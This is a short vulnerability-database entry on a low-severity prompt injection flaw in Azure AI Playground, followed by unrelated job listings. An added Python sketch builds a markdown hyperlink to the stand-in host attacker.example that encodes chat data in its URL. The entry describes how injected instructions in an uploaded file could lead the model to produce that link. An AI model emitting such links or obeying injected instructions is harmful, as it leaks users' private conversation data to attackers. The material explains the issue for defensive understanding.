Oct. 19, 2023 | The Open Cloud Vulnerability & Security Issue Database (www.cloudvulndb.org)

In Azure AI Playground, a prompt injection attack could cause an LLM to return markdown tags. This would have allowed an adversary whose data makes it into the chat context (e.g., via an uploaded file) to exfiltrate the victim's data through rendered hyperlinks. However, the severity of this issue is low, as there were no integrations that could pull remote content. This means indirect prompt injection was not possible, and it would require the victim to copy the …
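To make the mechanism concrete, the sketch below shows how rendered markdown can serve as an exfiltration channel: injected instructions ask the model to emit a hyperlink whose URL encodes data from the chat, so rendering and clicking the link sends that data to an attacker-controlled host. This is an illustrative sketch only; the endpoint attacker.example, the payload wording, and the helper function are hypothetical and not taken from the original report.

```python
# Minimal sketch of markdown-based data exfiltration via an injected prompt.
# "attacker.example" and build_exfil_markdown are hypothetical, for illustration only.
from urllib.parse import quote

def build_exfil_markdown(chat_context: str) -> str:
    """Encode chat data into the URL of a markdown hyperlink.

    If the client renders the returned markdown and the victim follows the
    link, the encoded data is sent to the attacker-controlled host.
    """
    stolen = quote(chat_context)
    return f"[Click here for details](https://attacker.example/log?d={stolen})"

# An instruction hidden in an uploaded file might tell the model to wrap
# earlier conversation content in such a link.
print(build_exfil_markdown("earlier user messages and other sensitive context"))
```

Because the playground had no integrations that fetch remote content, a payload like this could only reach the model through data the victim supplied directly, which is what keeps the severity low.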


Sr. Product Manager @ MixMode | Remote, US
Information Security Engineers @ D. E. Shaw Research | New York City
Technology Security Analyst @ Halton Region | Oakville, Ontario, Canada
Senior Cyber Security Analyst @ Valley Water | San Jose, CA
PNT/NAVWAR Space Electronic Warfare Instructor II – Officer Training Course @ Aleut Federal | Colorado Springs, Colorado, United States
Sr Director, Cybersecurity SIRT @ Workday | USA, VA, McLean